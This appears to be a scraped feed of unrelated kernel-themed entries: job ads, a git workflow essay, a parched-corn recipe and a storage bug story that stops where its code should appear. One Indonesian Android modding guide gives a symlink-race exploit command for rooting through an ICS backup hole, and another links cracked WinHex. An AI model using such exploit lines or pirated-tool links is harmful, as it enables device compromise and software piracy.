We are a team in Azure Compute responsible for providing persistency by utilizing exabytes of storage in Microsoft datacenters. Our software aggregates disk space and makes it available to customers as block storage (disks of any size – currently from 1 GB to 320 Petabytes), or relational storage (highly available SQL databases). Our technology is uniquely interesting because it touches all levels of software stack - from the Windows kernel storage drivers to massively replicated, PAXOS-based distributed system that coordinates global storage allocation. Our team subscribes to all modern paradigms of software development - we roll out to production every week, we code-review every change, we use cloud build/test pipeline, we design high-scale, loosely coupled systems with built-in fail-safe and self-healing mechanisms, we do copious amount of production debugging, testing and monitoring, and we collect the data before writing code. And we have been doing it for the last five years. We are looking for senior and principal engineers who can help us take the system to the next level: expose it for wide usage in Azure, scale up to the next order of magnitude (from exabytes currently), and optimize distribution algorithms for Azure datacenters. You should be able to quickly learn several large codebases, produce simple solutions for real problems, implement them efficiently, and patiently guide production deployments to success. Why should you work on our team? Our technology is one of the top three most advanced systems in its field on the planet. If you love storage and/or distributed systems, this is the system to work on. If you have expertise in operating systems development, and would like to expand into distributed systems, or vice versa, this is a great opportunity to capitalize on your existing expertise while learning the other universe. We have the resources of a huge, powerful company behind it, but none of the bureaucratic overhead that is often associated with it. We are at the tip of tens of billions of dollars the company is investing in software services in general, and Azure in particular. You will work with brilliant people on a project that directly impacts thousands of developers, and indirectly impacts hundreds of millions of customers. You will learn new things, and share your knowledge with us. Interested? Drop us your resume and we will be happy to talk more! Preferred Qualifications: •Distributed systems, or operating systems kernel and driver development. •Experience with the Windows Storage stack and SQL Server is preferred •C++ (on a scale from one to ten where Stroustrup is eight, we expect you to be no less than five). Basic Qualifications: •5+ years of commercial software development experience “You will be required to pass Microsoft background checks prior to the start of employment and periodically thereafter. Further details regarding this process will be provided in follow up correspondence.” Ability to meet Microsoft, customer and/or government security screening requirements are required for this role. These requirements include, but are not limited to the following specialized security screenings: Microsoft Cloud Background Check: This position will be required to pass the Microsoft Cloud background check upon hire/transfer and every two years thereafter. Microsoft is an equal opportunity employer. All qualified applicants will receive consideration for employment without regard to age, ancestry, color, family or medical care leave, gender identity or expression, genetic information, marital status, medical condition, national origin, physical or mental disability, political affiliation, protected veteran status, race, religion, sex (including pregnancy), sexual orientation, or any other characteristic protected by applicable laws, regulations and ordinances. If you need assistance and/or a reasonable accommodation due to a disability during the application or the recruiting process, please send a request to askstaff@microsoft.com. Development (engineering)
          Device Driver Development Engineer - Intel - Singapore   
Knowledge of XDSL, ETHERNET switch, wireless LAN, Security Engine and microprocessor is an advantage. Linux Driver/Kernel development for Ethernet/DSL/LTE Modem...
From Intel - Sat, 17 Jun 2017 10:23:08 GMT - View all Singapore jobs
          Kernel Traffic   
none
          KernelTrap   
none
          IC Resources Ltd: Embedded Linux Software Engineer   
Negotiable: IC Resources Ltd: Talented Embedded Linux and Linux Kernel Software Engineers are sought by this leading Cambridge based communications developer. Cambridge
          Overcoming Individualism   

By Matt Hartman

DSA’s recent growth has been well celebrated. But while it is a sign of hope, it would be a mistake to assume that this path will lead to the socialist movement we want, because who is joining DSA and how they relate to the rest of the world is just as important as how many of us there are.

To be clear, the “Bernie Bro” narrative painting DSA as a monolithically white and male organization is a fallacy that erases the many and longstanding contributions of socialist women and people of color. But there is a kernel of truth to it that has allowed it to take hold: exact demographics aren’t available, but it’s undeniable that DSA’s membership is whiter, richer, and more masculine than the working class we’re working for. To succeed in the long term, we must address that problem at the root by prioritizing organizing projects that create material connections between the everyday lives of DSA members and the working class more broadly.


          Membuat Splash Screen Sendiri   


--Perhatian! Bricked--
Pastkan Firmware [Software Version] E667.6.03.00.ID11 bukan  E667.6.01.08.ID11 
 
Link Ke Tutorial TKP http://goo.gl/1QpuL <-------------
 
Link Tools
HexEditor by TUBA
https://play.google.com/store/apps/details?id=tuba.tools&hl=en

Winhex Xways Full License tinggal dipilih aja Versinya.
http://cracking.z0ro.com/Reverse-Engineering/Editors-Viewers-Comparers/WINHEX/
Sengaja di Blog Link Winhex nya yg demo, soalnya kalo post link illegal nanti bisa kena BAN akun Google Adsense ane.

Bookmark Posisi Logo Smartfren di MMCBLK
Buat yang Kesusahan Klik GoTo Offset
Download http://www.facebook.com/download/356600391120227/Andromaxi_MMCBLK0P5_0P20.pos
Terus di Winhex Klik Position->Position Manager/ Bis tu di Bagian yang baru muncul, Klik Kanan & Pilih Load.
Kalo udah di Load nanti tgl klik2 Posisi yang udah ane kasih Nama.

########################
TIPS & TRICK SECTION
########################

** E is Invalid Character
Dibagian Offset diwinhex ada angka2 dibawahnya warna biru2. di Klik itu nanti tampilannya berubah jadi Hexadecimal.

**Kendala pas Dumping Partisi MMCBLK
Solusinya, Download ZIP splash yang udah jadi, Exctact ambil IMGnya terus buka Via WinHex.

**Gak Bisa Save
Download Winhex yang versi Full dilink doc ini.

** ERROR Write PROTECT
Problem 1 Sebabnya: Read only mode.
Di WinHex, Teken [F6] ganti jadi DefaultEdit Mode dari yang sebelumnya ReadOnly Mode.

Problem 2 Sebabnya: Winhex.exe langsung di executi tanpa di Extract
Extract dulu Zip winhexnya baru jalanin Winhex.exe

**Cek Firmware di SPLASH.IMG
Lihat address 248 sampe 258 disitu tertulis Firmware Version E667.6.03.00.ID11
Buat Liatnya bisa pake WinHex untuk Windows, atau pake app HexEditor download Di market. Untuk yg pake HexEditor di Maxi, Extract dulu file .IMG yang ada didalemnya sebelom dibuka lewat HexEditor.

------------------------------------------------------------------------------------------------------------------------------------

** Size gambar gak bisa lebih dari 202KB
Blok gambarnya ada di address 8E525 s/d C1380
Pastiin dulu di address 8E525 Hex codenya 89 50 4E 47 0D 0A 1A 0A 
 & di Address C1380 nilainya masih 82 &sebelahnya masih ada |END dengan kode 49 45 4E 44 AE 42 60 82.

-- Sukses Tapi Gambar ERROR!.
** Kalo gambar bukan sRGB nanti yang muncul dia akan bypass Splashscreen ato Blank Black Image ato gambarnya Jadi gak jelas. Pake mspaint ato program selain photosop untuk solusinya.

==================================
TIPS Bikin Gambar Gak Lebih dari 202KB
===================================

-- ScreenShot dari MAXI. by @Tablin Arya Juanda
Pake cara Screenshot dari device Andromax-I
- Buka gambarnya pake galeri biar fullscreen ato apalah.
-Teken Power+Vol Min barengan nanti ada suara cklik gitu yg nandain Screenshot telah diambil.

-- Pake Aplikasi RIOT [WINDOWS] Thanks @Apak Wawan
crop gambar ukuran 480x800 dulu, trs pilih png sbg output file, pilih compress to size, isi aja 200kb jd gak akan lebih besar ukuran filenya dari 202kb.
http://luci.criosweb.ro/riot/download/

=============================================================##########
=============================================================##########

***Tips Ambil Gambar yang ada dalam SPLASH.IMG Lewat WinHex
Dari WinHex buka .IMG file yang dimaksud, trus klik kanan pilih opsi Define Block isi bagian atasnya 8E525 & bagian bawahnya C1380. Setelah di OK langsung tekan CTRL+C trus klik kanan -> edit -> clipboard data -> paste into new file, gampangnya dengan teken SHIFT+INSERT. Abis itu bakalan nongol hasil copian kita di jendela baru, trus save dengan tipe belakang namnanya kasih .PNG

----------------------------------------------------------------------------------------------------------

Apa sih SplashScreen?
Splash screen adalah gambar yang muncul ketika sebuah game atau prrogram akan berjalan atau Loading.  Berbeda dengan Boot Animation pada android yang berisi banyak Gambar, Splashscreen akan muncul pertama kali lalu di ikuti dengan Boot Animation.

----------------------------------------------------------------------------------------------------------
Fastboot only tanpa Image
https://www.dropbox.com/s/a0zdolqmjmda70s/fastboot%2Bscript.rar

Ini yang udah jadi kayak gambar diatas.
Cuma Buat firmware version E667.6.03.00.ID11 bukan  E667.6.01.08.ID11
Cek dulu Versinya cocok ato nggak *#0000# ato *1973460#
Kernel Versi Gak Masalah, ROM Gak Masalah.

Lewat Fastboot
https://www.dropbox.com/s/a5blhhfye3phx9y/Splash_Andromaxi.rar

Lewat CWM [updater Script dari agan Tablin]
https://www.dropbox.com/s/6b8uq3br54iwbv2/Splash.zip

Splash ke Stock SF LOGO Via CWM [updater Script dari agan Tablin]
https://www.dropbox.com/s/szx4wgcg9727caa/Splash_Stock.zip

Sekali lagi Cek Firmware masing2 apa tulisannya udah E667.6.03.00.ID11 sebelum lanjutin pasang Splash.zip-nya ato Maxi bakal jadi BATAKO.

***Kalo ada yg mau Lewat CWM Flashnya, tinggal di tiban aja itu IMG buatan kita ke dalem ZIP-nya. di Tiban maksudnya Nama Filenya harus sama sama file yang ada didalem Zip-nya.

***Buat Jaga2 yang Pake CWM harap lihat ScriptUpdater yang ada di dalem ZIP
Buka Zip-nya arahin ke "META-INF\com\google\android\" buka Updater-Script pake notepad ato texeditor bawaan maxi ato apa aja.

Cek bagian :
package_extract_file("splash.img", "/dev/block/mmcblk0p5");
package_extract_file("splash.img", "/dev/block/mmcblk0p20");
Pastiin diarahin ke 0p5 sama 0p20
----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------
Update Firmware ke E667.6.03.00.ID11 Bisa dengan cara melakukan TF UPDATE 7 November, dengan cara teken [Tombol Power + VolUp + VolMin] eg909v1 . Jangan lupa abis itu dial *#0000# .

Link Ke Lapak TF Update.
http://www.facebook.com/groups/428486680533882/doc/440932139289336/
----------------------------------------------------------------------------------------------
sumber : Facebook unoficial smartfren andromax i
          ANDROMAXI SCRIPT & CWM Based Recovery   
====================================
ANDROMAXI SCRIPT & CWM Based Recovery
by : Tablin Arya Juanda
====================================

DISLAIMER : Saya tidak bertanggung jawab apabila terjadi hal hal yang tidak diinginkan, saya telah mempraktekkan pada device saya dan dapat berfungsi sebagai mana fungsinya.

====================================
-----------Andromaxi HS-EG909 Script---------------
----------------latest version : v 1.1------------------
====================================
Jalankan proses di windows, script saat ini support windows operating system

Menu/Feature :
---Run In Fastboot ---
1.Install cwm based recovery
2.Install touch recovery
3.restore stock recovery
4.Reboot

---Run In ADB ---
5.root via ADB (for Anvance user only)
6.Unroot via ADB (not recomended)
7.Init.d Support
8.Reboot
9.Reboot Recovery
0.Reboot Bootloader (fastboot)


More feature come... 
Please downnload cwm-recovery.img , touch-recovery.img and stock-recovery.img
and place it inside the data folder so file will be
Andromaxi/
Andromaxi/Andromaxi.bat
Andromaxi/Notes.txt
Andromaxi/data/* (adb, fastboot etc)
Andromaxi/data/cwm-recovery.img
Andromaxi/data/touch-recovery.img
Andromaxi/data/stock-recovery.img
To run the script just double click Andromaxi.bat and follow the scripts..

Extra :
- bootanimation.zip from CM10 (480x800 boot animation) install in /system/media/
- CWM-SuperSU-v0.99.zip (SuperSU App and su binary, busybox not included) install via cwm recovery

Untuk Menu 1 - 4 dilakukan di Fastboot
Untuk Menu 5 - 0 dilakukan di ADB (lihat notes dibawah)
Gmana cara install adb ato fastbootnya cari info sendiri

Silahkan download file Andromaxi.zip kemudian extrak didalamnya sudah ada file pendukung untuk adb dan fastboot (bukan driver)
Untuk file cwm-recover.img, cwm touch-recovery.img dan stock-recovery.img sengaja saya pisah karena kemungkinan kedepannya akan saya update, silahkan download dan dimasukkan ke folder data.
Anda juga dapat mencoba versi cwm lain dan rename menjadi cwm-recovery.img

Misalnya: download 6.0.1.9-cwm-recovery.img (versi 6.0.1.9) dan di rename menjadi cwm-recovery.img kemudian masukkan ke folder data

Download : https://www.dropbox.com/sh/dptph0ldj5cegvu/LvgTq-6iPH

untuk menjalankan script cukup menjalankan file Andromaxi.bat dan memilih menu yang diinginkan..

Untuk instalasi Driver ADB dan fastboot cara paling mudah adalah dengan mengkoneksikan device dengan pc mada mode data connection kemudian install aplikasi bawaan smartfren..

Tambahan buat Aktifin ADB conection karena banyak yang tanya:
  • koneksikan Andromaxi ke komputer dengan kabel usb
  • pilih : data connections
  • Akan muncul cd rom di komputer untuk instalasi modem, install jika belum terinstall
  • setelah selesai eject cd (hal ini akan mengaftifkan adb connections (Debuging)
  • eject cd ini diperlukan setiap ingin menjalankan adb.exe
  • atau dapat pula dengan menginstall android sdk
  • pastikan adb dapat terkoneksi dengan baik
  • Pastikan vendor id  ; 0x109b ada di C:\Users\Nama User Anda\.android\adb_usb.ini
  • Jika belum ada folder .android di C:\Users\Nama User Anda\ copy folder .android dalam folder Andromaxi ke C:\Users\Nama User Anda\

Last : sekali lagi mengingatkan : DO IT ON YOUR OWN RISK

===========================================================
CWM Based Recovery
===========================================================

Source : https://github.com/CyanogenMod/android_bootable_recovery
Latest version : 6.0.2.3

Work :
  • Backup
  • Restore
  • Install zip (sdcard, internal sd, via adb)
  • wipe dalvic cache
  • wipe cache
  • wipe data
  • fix permission
  • Partition SD card (untuk buat partisi ke 2 (/sd-ext) n swap partition

Bug :
  • Kadang reboot dan reboot recovery cukup lama (jangan kaget, kalo emang gak reboot reboot cabut batere)

Download : https://www.dropbox.com/sh/dptph0ldj5cegvu/LvgTq-6iPH

Jika menggunakan Andrmaxi Script diatas, script mengenali lokasi image
1.Install cwm based recovery >>> /data/cwm-recovery.img
2.Install touch recovery >>> /data/touch-recovery.img
3.restore stock recovery >>> /data/stock-recovery.img

sehingga jika perlu rename nama image sesuai deengan nama diatas
misal 6.0.2.3-cwm-recovery.img >>> cwm-recovery.img

Update: jika ada temuan lebih baru atau versi lebih baru saya akan update

Latest Build
  • 6.0.2.3-cwm-recovery.img : Custom build using 6.0.2.3 source, 8 november kernel + some file from stock recovery (fix reboot issue : i hope.... )

Mohon Rename File tersebut menjadi cwm-recovery.img sebelum instalasi menggunakan Andromaxi script >>> /data/cwm-recovery.img

Note :
untuk touch-recovery.img di build dengan mesin dikarenakan saya belum mendapat soucecode untuk touchnya... kemungkinan ada error atau fungsi yang belum jalan... klo mau testing silahkan, namun saya merekomendasikan menggunakan yang biasa saja..

===========================================================
ROOT UNROOT VIA ADB Tanpa Recovery

Notes : Hal ini sudah tidak diperlukan lagi karena root dapat dilakukan melalui instalasi zip melalui cwm recovery..

Requirement:


Skema :
  • Memanfaatkan hole yang ada di ICS pada saat backup- restore yang memungkinkan kita menulis di /data
  • melakukan restore dengan fakebackup.ab
  • exlpoit shell "while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99; do :; done"
  • memasang su, busybox di /system/xbin
  • memasang superuser.apk di /system/app

Langkah Kerja :
  • Install Terminal Emulator di Andromaxi : https://play.google.com/store/apps/details?id=jackpal.androidterm&hl=en
  • download Andromaxi.zip kemudian extrak 
  • koneksikan Andromaxi ke komputer dengan kabel usb
  • pilih : data connections
  • Akan muncul cd rom di komputer untuk instalasi modem, install jika belum terinstall
  • setelah selesai eject cd (hal ini akan mengaftifkan adb connections (Debuging)
  • eject cd ini diperlukan setiap ingin menjalankan adb.exe
  • atau dapat pula dengan menginstall android sdk
  • pastikan adb dapat terkoneksi dengan baik
  • Pastikan vendor id  ; 0x109b ada di C:\Users\Nama User Anda\.android\adb_usb.ini
  • Jika belum ada folder .android di C:\Users\Nama User Anda\ copy folder .android dalam folder Andromaxi ke C:\Users\Nama User Anda\
  • Buka folder Andromaxi
  • Jalankan Andromaxi.bat
  • Pilih Mode yang diinginkan 3 untuk root 4 untuk unroot
  • saat diminta untuk restore buka Andromaxi dan pilih restore
  • untuk rooting ditengah proses setelah reboot android akan eror SystemUI crash ini berarti exploit masuk dan Andromaxi masuk mode emulator sehingga kita dapat menyisipkan dil su, busybox dan superuser.apk
  • Saat eror anda perlu mebuka Terminal Emulator dan mengetikkan : am start -n com.android.settings/.deviceinfo.UsbSettingsManager (penulisan huruf besar kecil berpengaruh)
  • Hal ini dilakukan untuk membuka opsi USB sehingga kita dapat melanjutkan proses selanjutnya (Perlu koneksi ADB -- jangan lupa untuk eject cd untuk mengaktifkan debugging atau proses tidak dapat dilanjutkan.
  • Untuk Unroot tinggal pilih menu no 4

Metode Lain : http://www.cidtux.net/2/post/2012/11/cara-root-smartfren-andromax-i-ad683g-hisense-eg909-di-linux.html
hampir sama prinsipnya hanya menggunakan linuk dan metode yang berbeda pada instalasi su,busybox dan superusernya

Apabila tejadi kegagalan dapat dilangi prosesnya, terburuknya melakukan factory reset pama setting dan akan kehilangan data dan aplikasi yang telah di install

sekalilagi mengingatkan : DO IT ON YOUR OWN RISK

For testing only, klo gak yakin tunggu dari master master yang lain, misal lewat mode recovery yang lebih cepat dan tidak perlu repot....

NB : Maaf Scriptnya pake bahasa inggris ...

Semoga bermanfaat, mohon koreksi klo ada yang salah, maklum baru punya android ... masi newbie

thanx :sumberValid

          My Git Workflow   

Git’s great! But it’s difficult to learn (it was for me, anyway) – especially the index, which unlike the power-user features, comes up in day-to-day operation.

Here’s my path to enlightment, and how I ended up using the index in my particular workflow. There are other workflows, but this one is mine.

What this isn’t: a Git tutorial. It doesn’t tell you how to set up git, or use it. I don’t cover branches, or merging, or tags, or blobs. There are dozens of really great articles about Git on the web; here are some. What’s here are just some pictures that aren’t about branches or blobs, that I wished I’d been able to look at six months ago when I was trying to figure this stuff out; I still haven’t seen them elsewhere, so here they are now.

My brief history with Git

I started using Git about six months ago, in order to productively subcontract for a company that still uses Perforce. Before that I had been a happy Mercurial user; before that, a Darcs devotee; before that, a mildly satisfied Subversion supplicant; and before that, a Perforce proponent. (That last was before the other systems even existed. I introduced Perforce into a couple of companies that had previously been using SourceSafe(!) – including the one I was now contracting for.)

Each of these systems has flaws. Perforce and Subversion require an always-on connection and make branching (and merging) expensive, and Perforce uses pessimistic locking too (you have to check a file out before you can edit it). I got hit by the exponential merge bug in Darcs (since fixed?); a deeper problem was that I found I wanted to be able to go back in time more often than I needed to commute patches, whereas Darcs makes the latter easy at the expense of the former – so Darcs’ theory of patches, although insightful and beautiful, just didn’t match my workflow.

Git’s problem is its complexity. Half of that is because it’s actually more powerful than the other systems: it’s got features that make it look scary but that you can ignore. Another half is that Git uses nonstandard names for about half its most common operations. (The rest of the VCS world has more or less settled on a basic command set, with names such as “checkout” and “revert”. Not Git!) And the third half is the index. The index is a mechanism for preventing what you commit from matching what you tested in your working directory. Huh?

Git without the index

I got through my first four months of Git by pretending it was Subversion. (A faster implementation of Subversion, that works offline, with non-awful branches and merging, that can run as a client to Perforce – but still basically Subversion.) The executive summary of this mode of operation is that if you use “git commit -a” instead of “git commit”, you can ignore the index altogether. You can alias ci to “commit -a” (and train yourself not to use the longer commit, which I hadn’t been doing anyway), and then you don’t have to remember the command-line argument either:

$ cat ~/.gitconfig
[alias]
  ci = commit -a
  co = checkout
  st = status -a
$ git ci -m 'some changes'

Adding Back the Index

Git keeps copies of your source tree in the locations in this diagram1. (I’ll call these locations “data stores”.)

The data store that’s new, relative to every other DVCS that I know about, is the “index”. The one that’s new relative to centralized VCS’s such as Subversion and Perforce is the “local repository”.

The illustration shows that “git add” is the only (everyday) operation that can cause the index to diverge from the local repository. The only reason (in Subversion-emulation mode) to use “git add” is so that “git commit” will see your changes. The -a option to “git commit” causes “git commit” to run “git add -u” first – in which case you never need to run "git add -u" explicitly – in which case the index stays in sync with the repository head. This is how the trick in “git without the index” works: if you always use commit via “git commit -a”, you can ignore the index2.

So what’s the point of the index? Is it because Linus likes complicated things? Is to one-up all the other repositories? Is it to increase the complexity of system, so that you have a chance to shoot yourself in the foot if you’re not an alpha enough geek?

Well, probably. But it’s good for something else as well. Several things, actually; I’ll show you one (that I use), and point you to another.

But first, a piece of background that helps in understanding Git. Git isn’t at its core a VCS. It’s really a distributed versioning file system, down to its own fsck and gc. It was developed as the bottom layer of a VCS, but the VCS layer, which provides the conventional VCS commands (commit, checkout, branch), is more like an uneven veneer than like the “porcelain” it’s sometimes called: bits of file system (git core) internals poke through.

The disadvantage of this (leaky) layering is that Git is complicated. If you look up how to diff against yesterday’s 1pm sources in git diff, it will send you to git rev-parse from the core; if you look up git checkout, you may end up at git-check-ref-format. Most of this you can ignore, but it takes some reading to figure out which.

The advantage of the layering is that you can use Git to build your own workflows. Some of these workflows involve the index. Like the other fancy Git features, bulding your own workflows is something that you can ignore initially, and add when you get to where you need it. This is, historically, how I’ve used the index: I ignored it until I was comfortable with more of Git, and now I use it for a more productive workflow than I had with other VCS’s. It’s not my main reason for using Git, but it’s turned to a strength from being a liability.

My Git Workflow

Added: By way of illustration, here’s how I use Git. I’m not recommending this particular workflow; instead, I’m hoping that it can further illustrate the relation between the workspace, the index, and the repository; and also the more general idea of using Git to build a workflow.

I use the index as a checkpoint. When I’m about to make a change that might go awry – when I want to explore some direction that I’m not sure if I can follow through on or even whether it’s a good idea, such as a conceptually demanding refactoring or changing a representation type – I checkpoint my work into the index. If this is the first change I’ve made since my last commit, then I can use the local repository as a checkpoint, but often I’ve got one conceptual change that I’m implementing as a set of little steps. I want to checkpoint after each step, but save the commit until I’ve gotten back to working, tested code. (More on this tomorrow.)

Added: This way I can checkpoint every few minutes. It’s a very cheap operation, and I don’t have to spend time cleaning up the checkpoints later. “git diff” tells me what I’ve changed since the last checkpoint; “git diff head” shows what’s changed since the last commit. “git checkout .” reverts to the last checkpoint; “git checkout head .” reverts to the last commit. And “git stash” and “git checkout -m -b” operate on the changes since the last commit, which is what I want.

I’m most efficient when I can fearlessly try out risky changes. Having a test suite is one way to be fearless: the fear of having to step through a set of manual steps to test each changed code path, or worse yet missing some, inhibits creativity. Being able to roll back changes to the last checkpoint eliminates another source of fear.

I used to make copies of files before I edited them; my directory would end up littered with files like code.java.1 and code.java.2, which I would periodically sweep away. Having Git handle the checkpoint and diff with them makes all this go faster. (Having painless branches does the same for longer-running experiments, but I don’t want to create and then destroy a branch for every five-minute change.)

Here’s another picture of the same Git commands, this time shown along a second axis, time, proceeding from top to bottom. [This is the behavior diagram to the last picture’s dataflow diagram. Kind of.] A number of local edits adds up to something I checkpoint to the index via “git add -u”; after a while I’ve collected something I’m ready to commit; and every so many commits I push everything so far to a remote repository, for backup (although I’ve got other backup systems), and for sharing.

I’ve even added another step, releasing a distribution, that goes outside of git. This uses rsync (or scp, or some other build or deployment tool) to upload a tar file (or update a web site, or build a binary to place on a DVD).

Some Alternatives

Ryan Tomayko has written an excellent essay about a completely different way to use the repository. I recommend it wholeheartedly.

Ryan’s workflow is completely incompatible with mine. Ryan uses the repository to tease apart the changes in his working directory into a sequence of separate commits. I prefer to commit only code that I’ve tested in my directory, so Ryan’s method doesn’t work for me. I set pending work aside via git stash or git checkout -m -b when I know I might need to interrupt it with another change; this sounds like it might not work for Ryan. Neither one of these workflows is wrong (and I could easily use Ryan’s, I’m just slightly more efficient with mine); Git supports them both.

There’s another way to do this particular task – of checkpointing after every few edits, but only persisting some of these checkpoints into the repository. This is to commit each checkpoint to the repository (and go back to ignoring the index – at least for checkpointing – so this might work with Ryan’s), and rebase them later. Git lets you squash a number of commits into a single commit before you push it to a public repository (and edit, reorder, and drop unpushed commits too) – that’s the rebase -i block in the previous illustration, and you can read about it here. This is a perfectly legitimate mode of operation; it’s just one that I don’t use.

Both of these alternatives harken back to Git as being a tool for designing VCS workflows, as much as being a VCS system itself. The reasons I don’t use them myself bring us to Commit Policies, which I’ll write about tomorrow.



  1. This picture shows just those commands that copy data between the local repository, the remote repository, the index, and your workspace. There’s lots more going on inside these repositories (branches, tags, and heads; or, blobs, trees, commits, and refs). In fact, during a merge, there’s more going on inside the index, too (“mine”, “ours”, and “theirs”). To a first approximation, all that’s orthogonal to how data gets between data stores; we’ll ignore it.

  2. This isn’t quite true. You still need to use “git add” a new file to tell git about it, and at that point it’s in your index but not in your repository. You still don’t need to think about the repository in order to use it this way


          Sami Blood / Film School interview with Director Amanda Kernall   
SAMI BLOOD is the debut feature from writer/director Amanda Kernell, who based their beautifully rendered film from her own grandmother's life. Set in 1930s Sweden during the pre-Nazi Eugenics movement, SAMI BLOOD follows Elle, a young indigenous Lapland girl made to feel like an inferior species when she’s subjected to indoctrination and race biology in a Swedish boarding school. Elle escapes, and in doing so is estranged from her sister, her family and her culture. SAMI BLOOD is a unique and intimate perspective on the history of the Sami people, and tells a story of oppression that resonates across borders and generations. The film features a breakthrough performance from its young lead actress Lene Cecilia Sparrok, who has never acted before and is Sami herself. She stars in the film alongside her sister Mia Sparrok. Director and writer Amanda Kernell joins us to talk about her heart wrenching story of a young woman struggling to find a place in an increasingly hostile world. 90% on RottenTomatoes For news and updates go to: sami-blood.synergetic.tv facebook.com/sameblod Los Angeles Screening: Beginning June 30, 2017 at the Laemmle Monica Film Center
          Outlaw Country: Wikileaks desvela malware de la CIA para Linux   

Outlaw Country permite redirigir todo el tráfico saliente de un ordenador objetivo a ordenadores controlados por la CIA con el objetivo de poder robar archivos del ordenador infectado, o también para enviar archivos a ese ordenador. El malware consiste en un módulo de kernel que crea tablas netfilter invisibles en el ordenador objetivo con Linux, con lo cual se pueden manipular paquetes de red. Un operador puede crear reglas que tengan preferencia sobre las que existen en las iptables,

etiquetas: cia, outlaw country, malware, linux, wikileaks

» noticia original (www.adslzone.net)


          Making Toasted Corn Sludge - A Superfood Of Its Day   

After having successfully survived eating year old home-made hardtack, I was psyched to see that Jas. Towsend and Son had a new series for me to try: preparing and cooking parched corn.

Parched Corn, like pemmican and hardtack was a super-food in its day. Not because of it was so nutritious or tasty, but because it was cheap to make, relatively nutritionally dense, quite portable and had a long shelf life.

Here are two sources that describe how parched corn was used. First, from American Indian Corn Dishes by Muriel H.Wright:

Botah Kapussa (Cold Flour) : Shell corn from the cob when the grain has reached the stage where it is firm but not dry. Place the shelled corn in a large pot of hot ashes, keeping the pot over coals of fire until the corn is parched a golden brown, in the meantime stirring the grain to keep it from scorching. Put the corn into the fanner, and clean off the ashes. Next pound the corn in the mortar until the husks are loosened. Again clean out the husks from the grain in the fanner. Beat the clean corn into flour in the mortar. This parched corn flour may be sweetened with enough sugar to taste. Add enough water to dampen a small serving, and eat as a cereal. A small amount of botah kapussah will go a long way as food.

In tribal times, the Indian hunter took a small bag of this unsweetened food with him on long expeditions, often traveling many days with nothing else to eat except botaic kapussuh, a little at a time generally mixed with water. This cold flour was a boon on a long hunting expedition because a small amount was nourishing, and a bag of it was light and easy to carry.

And here's one from encyclopediavirginia.org:

For travel, some Indian families carried dried venison, but most preferred rockahominy: dried parched corn that was beaten into powder and thus easily carried in a bag. A few handfuls of rockahominy, with water scooped out of trailside streams, served as an entire meal. (Europeans would later add sugar to the mix for palatability.)

Tales like these had me convinced: I needed to parch some corn, and perhaps add it to my hiking / backpacking diet.

Parching corn didn't look that hard, you take dry corn, toast it and then grind it up. But where does one find dried corn? Fortunately, I found this citified recipe on the web. It called for taking frozen sweet corn, dehydrating it, and then tossing it into a frying pan to parch it. So that's what I did.

While dehydrating took hours, it wasn't really a lot of work. What was surprising was that when I was done, the dehydrated corn was pretty much inedible. This wasn't looking so promising.

I then grabbed a frying pan, sprayed a bit of olive oil Pam in it (probably too much) and dropped in some dry kernels. I then turned on the heat and waited. That was a bad idea, because I definitely ended up over-cooking the first batch. But once I got the hang of shimming the pan around, I could see how you could toast the corn without burning it.

When I was done with the parching process I had two batches. One of these batches I dropped into our hand blender's chopper and zapped it for 30 seconds or so. Here were the results:

Over the next couple days I noshed on my creation. I mixed boiling water with the powder to make a sort of sludge, while the larger kernels I just ate by the handful.

The good news is, parching the corn made the inedible dehydrated kernels quite edible. And they were nice and dry (minus any extra olive oil), so I could see how this could resist spoilage. In terms of taste, it was OK. The sludge was definitely palatable, and if I were eating it at the end of a long day of hiking, I'd have rated it a 10 out of 10. But in my kitchen, it was just OK. Nothing special. It was like eating toasted corn sludge, which of course, is all it was.

Snacking on the larger kernels grew on me. Again, they weren't heavenly, but I could totally see paying a ridiculous sum of money at Whole Foods for the privilege of buying a bag of this stuff.

Will it get added to my backpacking menus? Hard to say. But I can report that this was an awesome culinary experiment and recommend you try it. That, and I have even more respect for the Indian hunters who lived off a handful of this stuff a day.


          ASUS ROG Strix Radeon RX580 OC Edition Performance on Ubuntu Linux KVM PCI Pass-Through    

For those following our Kernel-based Virtual Machine (KVM) coverage here is a status update.

Initially my plan was to evaluate on the new Ryzen AM4 platform but I've encountered some delays. More specifically, software troubles related to PCI Pass-Through -- without stable PCI Pass-Through the entire purpose of evaluation has been defeated.

read more


          Bug stories: The data corruption in the cluster   

imageThe bug started as pretty much all others. “We have a problem when replicating from a Linux machine to a Windows machine, I’m seeing some funny values there”. This didn’t raise any alarm bells, after all, that was the point of checking what was going on in a mixed mode cluster. We didn’t expect any issues, but it wasn’t surprising that they happened.

The bug in question showed up as an invalid database id in some documents. In particular, it meant that we might have node A, node B and node C in the cluster, and running a particular scenario suddenly started also reporting node Ω, node Σ and other fun stuff like that.

And so the investigation began. We were able to reproduce this error once we put enough load on the cluster (typically around the 20th million document write or so), and it was never consistent.

We looked at how we save the data to disk, we looked at how we ready it, we scanned all the incoming and outgoing data. We sniffed raw TCP sockets and we looked at everything from the threading model to random corruption of data on the wire to our own code reading the data to manual review of the TCP code in the Linux kernel.

The later might require some explanation, it turned out that setting TCP_NODELAY on Linux would make the issue go away. That only made things a lot harder to figure out. What was worse, this corruption only ever happened in this particular location, never anywhere else. It was maddening, and about three people worked on this particular issue for over a week with the sole result being: “We know where it roughly happening, but no idea why or how”.

That in itself was a very valuable thing to have, and along the way we were able to fix a bunch of other stuff that was found under this level of scrutiny. But the original problem persisted, quite annoyingly.

Eventually, we tracked it down to this method:

We were there before, and we looked at the code, and it looked fine. Except that it wasn’t. In particular, there is a problem when the range we want to move is overlapped with the range we want to move it to.

For example, consider that we have a buffer of 32KB, and we read from the network 7 bytes. We then consumed 2 of those bytes. In the image below, you can see that as the Origin, with the consumed bytes shown as ghosts.

image

What we need to do now is to move the “Joyou” to the beginning of the buffer, but note that we need to move it from 2 – 7 to 0 – 5, which are overlapping ranges. The issue is that we want to be able to fully read “Joyous”, which require us to do some work to make sure that we can do that. This ReadExactly piece of code was written with the knowledge that at most it will be called with 16 bytes to read, and the buffer size is 32KB, so there was an implicit assumption that those ranges can’t overlap.

